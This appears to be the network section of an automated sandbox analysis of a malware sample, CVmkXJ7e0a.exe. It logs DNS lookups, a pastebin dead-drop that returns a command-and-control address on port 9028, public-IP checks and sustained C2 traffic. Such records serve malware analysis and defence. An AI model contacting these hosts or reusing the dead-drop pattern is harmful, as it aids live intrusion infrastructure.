Dec 13, 2024 08:25:44.927639008 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:45.174361944 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:45.229231119 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:45.471452951 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:45.471613884 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:45.472331047 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:45.475214958 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:45.475334883 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:45.765358925 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:45.765513897 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:46.062247038 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:50.020139933 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:50.312844992 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:50.313064098 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:50.599467993 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:58.070305109 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:58.369092941 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:58.369245052 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:58.616158009 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:58.663815975 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:58.898329973 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:58.898480892 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:58.899144888 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:58.909784079 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:58.909935951 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:59.193769932 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:25:59.194005013 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:25:59.488993883 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:11.504905939 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:11.801465034 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:11.801733017 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:12.048631907 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:12.049694061 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:12.349478006 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:12.349706888 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:12.646786928 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:16.753751040 CET	49723	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:26:16.868244886 CET	80	49723	104.16.185.241	192.168.11.20
Dec 13, 2024 08:26:16.868422985 CET	49723	80	192.168.11.20	104.16.185.241
Dec 13, 2024 08:26:24.939326048 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:25.236196995 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:25.236380100 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:25.483088017 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:25.532901049 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:25.778928041 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:25.779787064 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:26.079937935 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:26.080172062 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:26.327260017 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:26.328178883 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:26.624684095 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:26.624910116 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:26.921854973 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:27.142071009 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:27.437460899 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:27.437714100 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:27.684530020 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:27.685415030 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:27.985001087 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:27.985409975 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:28.277896881 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:30.531939030 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:30.706466913 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:30.706516027 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:30.820782900 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:30.952721119 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:30.953536987 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:31.000439882 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:31.246834993 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:31.247807980 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:31.536509037 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:31.536637068 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:31.833619118 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:37.405550003 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:37.702441931 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:37.702816963 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:37.949594975 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:38.008152008 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:38.254276991 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:38.255770922 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:38.542763948 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:38.542895079 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:38.837176085 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:39.654993057 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:39.957020998 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:39.957297087 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:40.204056978 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:40.204289913 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:40.451718092 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:40.452682018 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:40.748862982 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:40.749054909 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:41.044183969 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:46.419073105 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:46.718482018 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:46.718699932 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:46.965580940 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:47.012542009 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:47.258650064 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:47.259484053 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:47.558150053 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:47.558378935 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:47.852812052 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:48.418632984 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:48.711514950 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:48.711735964 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:48.958362103 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:48.958570957 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:49.204670906 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:49.204838037 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:49.506167889 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:49.506390095 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:49.753463984 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:49.809505939 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:50.055784941 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:50.056579113 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:50.346003056 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:50.346167088 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:50.644004107 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:53.089586973 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:53.388014078 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:53.388470888 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:53.635453939 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:53.682933092 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:53.928960085 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:53.929910898 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:54.227551937 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:54.227689028 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:54.524357080 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:55.260822058 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:55.552826881 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:55.553020954 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:55.799696922 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:55.854355097 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:56.100636959 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:56.106834888 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:56.409044027 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:56.409233093 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:56.705328941 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:56.705560923 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:56.952214956 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:56.952311993 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:57.198534966 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:57.199843884 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:57.497988939 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:57.498117924 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:57.794507980 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:57.947770119 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:58.247080088 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:58.247240067 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:58.494556904 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:58.541279078 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:58.788492918 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:58.790080070 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:59.087414026 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:59.087652922 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:59.341360092 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:59.384813070 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:59.630881071 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:59.632390976 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:26:59.930335999 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:26:59.930589914 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:00.225224972 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:01.962497950 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:02.263086081 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:02.263231039 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:02.510356903 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:02.511428118 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:02.757635117 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:02.758645058 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:03.004801035 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:03.005011082 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:03.306912899 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:03.307034016 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:03.602087021 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:03.805860996 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:04.100235939 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:04.100414038 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:04.347181082 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:04.399369955 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:04.645431042 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:04.646328926 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:04.942833900 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:04.942986012 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:05.237442970 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:07.117590904 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:07.405328035 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:07.405463934 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:07.652272940 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:07.653125048 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:07.950476885 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:07.950669050 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:08.197521925 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:08.242312908 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:08.476717949 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:08.488385916 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:08.488567114 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:08.734973907 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:08.735166073 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:08.735253096 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:08.788983107 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:08.981393099 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:08.981543064 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:09.273542881 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:10.179603100 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:10.474771976 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:10.475024939 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:10.721837044 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:10.772953033 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:11.019344091 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:11.020241022 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:11.315428019 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:11.315623999 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:11.611193895 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:11.611392021 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:11.858465910 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:11.913264036 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:12.159228086 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:12.210239887 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:15.093703985 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:15.382515907 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:15.382672071 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:15.630105019 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:15.678114891 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:15.924060106 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:15.924431086 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:16.224195004 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:16.224462032 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:16.520322084 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:28.534785032 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:28.827188015 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:28.827342987 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:29.075138092 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:29.128292084 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:29.374362946 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:29.374782085 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:29.665796041 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:29.666012049 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:29.963438988 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:41.969373941 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:42.265537024 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:42.265773058 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:42.512517929 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:42.562817097 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:42.808948994 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:42.809603930 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:43.107326031 CET	9028	49715	147.185.221.22	192.168.11.20
Dec 13, 2024 08:27:43.107485056 CET	49715	9028	192.168.11.20	147.185.221.22
Dec 13, 2024 08:27:43.401258945 CET	9028	49715	147.185.221.22	192.168.11.20

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 13, 2024 08:25:09.687964916 CET	59477	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:25:09.802314043 CET	53	59477	1.1.1.1	192.168.11.20
Dec 13, 2024 08:25:10.752823114 CET	53660	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:25:11.576464891 CET	53	53660	1.1.1.1	192.168.11.20
Dec 13, 2024 08:25:18.335741997 CET	62296	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:25:18.450654030 CET	53	62296	1.1.1.1	192.168.11.20
Dec 13, 2024 08:25:21.264755964 CET	61768	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:25:21.380728960 CET	53	61768	1.1.1.1	192.168.11.20
Dec 13, 2024 08:25:26.214750051 CET	49253	53	192.168.11.20	1.1.1.1
Dec 13, 2024 08:25:26.329301119 CET	53	49253	1.1.1.1	192.168.11.20

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 13, 2024 08:25:09.687964916 CET	192.168.11.20	1.1.1.1	0x46dd	Standard query (0)	pastebin.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:10.752823114 CET	192.168.11.20	1.1.1.1	0x24c3	Standard query (0)	l-carlo.gl.at.ply.gg	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:18.335741997 CET	192.168.11.20	1.1.1.1	0x3df0	Standard query (0)	icanhazip.com	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:21.264755964 CET	192.168.11.20	1.1.1.1	0x59e7	Standard query (0)	marketdedamoroza.webhop.me	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:26.214750051 CET	192.168.11.20	1.1.1.1	0xb0b3	Standard query (0)	49.39.14.0.in-addr.arpa	PTR (Pointer record)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Dec 13, 2024 08:25:09.802314043 CET	1.1.1.1	192.168.11.20	0x46dd	No error (0)	pastebin.com		104.20.4.235	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:09.802314043 CET	1.1.1.1	192.168.11.20	0x46dd	No error (0)	pastebin.com		172.67.19.24	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:09.802314043 CET	1.1.1.1	192.168.11.20	0x46dd	No error (0)	pastebin.com		104.20.3.235	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:11.576464891 CET	1.1.1.1	192.168.11.20	0x24c3	No error (0)	l-carlo.gl.at.ply.gg		147.185.221.22	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:18.450654030 CET	1.1.1.1	192.168.11.20	0x3df0	No error (0)	icanhazip.com		104.16.185.241	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:18.450654030 CET	1.1.1.1	192.168.11.20	0x3df0	No error (0)	icanhazip.com		104.16.184.241	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:21.380728960 CET	1.1.1.1	192.168.11.20	0x59e7	No error (0)	marketdedamoroza.webhop.me		0.0.0.0	A (IP address)	IN (0x0001)	false
Dec 13, 2024 08:25:26.329301119 CET	1.1.1.1	192.168.11.20	0xb0b3	Name error (3)	49.39.14.0.in-addr.arpa	none	none	PTR (Pointer record)	IN (0x0001)	false

HTTP Request Dependency Graph

pastebin.com

icanhazip.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49719	104.16.185.241	80	4984	C:\Users\user\Desktop\CVmkXJ7e0a.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:25:18.566581964 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 13, 2024 08:25:18.693553925 CET	537	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:25:18 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=n1N2_hwjFpQlXcLzwIDM7brMqqD6eMYQwruoJz3OjHw-1734074718-1.0.1.1-b2GCGpUQTituaz_r0V3sYWIDKNQ4c70Z.du6jGoK6JgR.1pDxZMyRVQls0VG_1Ph09eIgKPQ7xndOKsdPMx5SA; path=/; expires=Fri, 13-Dec-24 07:55:18 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8f14382f6de5b02f-ATL alt-svc: h3=":443"; ma=86400 Data Raw: 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0a Data Ascii: 89.187.171.165

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.11.20	49723	104.16.185.241	80	4984	C:\Users\user\Desktop\CVmkXJ7e0a.exe

Timestamp	Bytes transferred	Direction	Data
Dec 13, 2024 08:25:26.086349964 CET	63	OUT	GET / HTTP/1.1 Host: icanhazip.com Connection: Keep-Alive
Dec 13, 2024 08:25:26.208214998 CET	537	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:25:26 GMT Content-Type: text/plain Content-Length: 15 Connection: keep-alive Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET Set-Cookie: __cf_bm=SNls9OqbGC8L2bQWtkueq5EjZLUZno_SWJYGTdR.8JI-1734074726-1.0.1.1-CW7uvjfCjHIhPnhwroqgtcWAVWPGHvHpN.p7IvfAtsVDrpflsIV4EcB1qi.TFcDxJtvH.7dx2X3TGVtgFaim4Q; path=/; expires=Fri, 13-Dec-24 07:55:26 GMT; domain=.icanhazip.com; HttpOnly Server: cloudflare CF-RAY: 8f14385e6ff7e592-ATL alt-svc: h3=":443"; ma=86400 Data Raw: 38 39 2e 31 38 37 2e 31 37 31 2e 31 36 35 0a Data Ascii: 89.187.171.165

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.11.20	49714	104.20.4.235	443	4984	C:\Users\user\Desktop\CVmkXJ7e0a.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-13 07:25:10 UTC	74	OUT	GET /raw/bCQ1bAxy HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2024-12-13 07:25:10 UTC	388	IN	HTTP/1.1 200 OK Date: Fri, 13 Dec 2024 07:25:10 GMT Content-Type: text/plain; charset=utf-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-content-type-options: nosniff x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: MISS Last-Modified: Fri, 13 Dec 2024 07:25:10 GMT Server: cloudflare CF-RAY: 8f1437fb28e753c6-ATL
2024-12-13 07:25:10 UTC	31	IN	Data Raw: 31 39 0d 0a 6c 2d 63 61 72 6c 6f 2e 67 6c 2e 61 74 2e 70 6c 79 2e 67 67 3a 39 30 32 38 0d 0a Data Ascii: 19l-carlo.gl.at.ply.gg:9028
2024-12-13 07:25:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	02:25:05
Start date:	13/12/2024
Path:	C:\Users\user\Desktop\CVmkXJ7e0a.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\CVmkXJ7e0a.exe"
Imagebase:	0x740000
File size:	1'070'080 bytes
MD5 hash:	B70651A7C5EC8CC35B9C985A331FFCA3
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
